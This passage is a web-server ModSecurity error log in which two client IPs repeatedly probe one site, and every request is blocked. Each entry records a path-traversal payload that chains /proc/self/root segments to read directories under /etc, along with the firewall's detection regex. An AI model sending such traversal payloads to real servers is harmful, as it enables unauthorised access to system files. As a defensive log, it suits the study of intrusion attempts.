"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_w-82sZHvlq4xgHq9wgAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:24.623919 2026] [:error] [pid 1961:tid 140411599251200] [client 74.7.243.203:47614] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_xHRXaaWotPICgYsfPQAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:25.979687 2026] [:error] [pid 2325:tid 140411565680384] [client 74.7.243.203:47626] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_xe82sZHvlq4xgHq9wwAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:27.291337 2026] [:error] [pid 1210:tid 140411733534464] [client 74.7.243.203:47632] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_x1KJy4A1bGlmj9BP8wAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:28.557064 2026] [:error] [pid 1961:tid 140411741927168] [client 74.7.243.203:47636] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_yHRXaaWotPICgYsfPgAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:29.863648 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.243.203:47638] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_yQeiSKl8TjouI-b8ZwAAA9M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:31.698615 2026] [:error] [pid 11293:tid 140411624429312] [client 74.7.243.203:43534] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_y9CmCSWTlPouqorGMAAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:35.315709 2026] [:error] [pid 1961:tid 140411557287680] [client 74.7.243.203:43536] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_znRXaaWotPICgYsfQAAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:37.622563 2026] [:error] [pid 7000:tid 140411733534464] [client 74.7.243.203:43548] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_0BePVOt35XCGZP8qLgAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:39.191673 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.243.203:43560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_0weiSKl8TjouI-b8bgAAA8M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:42.733916 2026] [:error] [pid 1016:tid 140411624429312] [client 74.7.243.203:37260] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_1pqmL8PQht4WJFlCGAAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:44.058781 2026] [:error] [pid 1210:tid 140411565680384] [client 74.7.243.203:37274] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_2FKJy4A1bGlmj9BP-QAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:45.398333 2026] [:error] [pid 1210:tid 140411548894976] [client 74.7.243.203:37282] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_2VKJy4A1bGlmj9BP-gAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:48.049666 2026] [:error] [pid 1210:tid 140411649607424] [client 74.7.243.203:37284] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_2lKJy4A1bGlmj9BP-wAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:49.589916 2026] [:error] [pid 1961:tid 140411649607424] [client 74.7.243.203:37298] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_3XRXaaWotPICgYsfQQAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:50.864864 2026] [:error] [pid 7437:tid 140411666392832] [client 74.7.243.203:54694] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_3geiSKl8TjouI-b8cwAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:52.364012 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.241.46:52076] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_4KBJNF7axNlVR0X3wQAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:49:53.811396 2026] [:error] [pid 1016:tid 140411557287680] [client 74.7.241.46:60004] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_4ZqmL8PQht4WJFlCGwAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:49:54.360421 2026] [:error] [pid 7000:tid 140411565680384] [client 74.7.243.203:54708] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_4hePVOt35XCGZP8qPgAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:55.022296 2026] [:error] [pid 11469:tid 140411708356352] [client 74.7.241.46:60006] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_45DEJR9VXonE_-1IfAAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:49:55.697787 2026] [:error] [pid 11469:tid 140411599251200] [client 74.7.243.203:54716] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_45DEJR9VXonE_-1IfQAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:56.204112 2026] [:error] [pid 1961:tid 140411574073088] [client 74.7.241.46:60014] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_5HRXaaWotPICgYsfRgAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
